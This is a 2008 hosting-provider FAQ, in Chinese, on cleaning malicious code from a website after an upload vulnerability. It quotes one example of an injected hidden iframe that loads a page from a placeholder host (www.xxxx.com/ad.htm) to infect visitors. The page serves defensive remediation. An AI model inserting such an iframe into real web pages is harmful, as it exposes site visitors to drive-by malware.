中国稳网用户

访问我的网站时杀毒软件报警提示中了病毒怎么办?

来源:   作者:   日期:2008-03-05
分享到:
访问我的网站时杀毒软件报警提示中了病毒怎么办?
这一般是因为您的网站中的某个程序有漏洞被黑客上传木马后,修改了您的网页并在您的网页中添加了病毒代码所致。

  疑问:贵司服务器上不是装有反病毒软件吗,为什么还会中此病毒代码?
  解答:此漏洞属于网站程序的上传漏洞,由于黑客只是插入了一段恶意代码而并非病毒文件,只有您访问了这个网址(恶意代码中的网址)后才会中病毒,所以即使您用杀毒软件来扫描这个文件也会认为没有病毒。这种情况需要手工删除病毒代码。

  解决办法:例如您是在访问/index.asp 这个网页时提示有病毒的,首先通过FTP登录,将index.asp这个文件下载到您本地电脑中。

  用记事本等工具打开index.asp文件。一般黑客会在这个文件尾部(或其他部分)插入一段代码:

<iframe src=http://www.xxxx.com/ad.htm frameBorder=0 width=100% height=100%></iframe>
    
    注:其中类似于这样的 http://www.xxxx.com/ad.htm 就是病毒的真实网址,把以上代码全部删除即可!如果尾部没有则可以用键盘 Ctrl+F 调用出搜索框,在查找内容处输入 iframe 然后再查询后删除以上代码。

  如果搜索完了也没有则恶意代码可能隐藏在index.asp中调用的其他文件中,比如index.asp 在首部包含了conn.asp或head.asp文件,有时病毒代码也会隐藏在这些文件里面,按上面的办法下载这些文件并删除相关的代码即可。

  清除病毒后还需找到您的网站漏洞所在,否则黑客今后可能再次上传病毒代码。如果您的网站使用了动网论坛、动易建站等程序,请将他们升级到最新版或者到这些程序的官方网站上寻求解决方案。如果您是自己开发的程序,需要特别注意有文件上传功能的地方,动网、动易等程序曾经就发生过因为上传功能有漏洞导致轻易被黑客入侵的情况。



推荐 】 【 打印

中国稳网 版权所有 wendns.com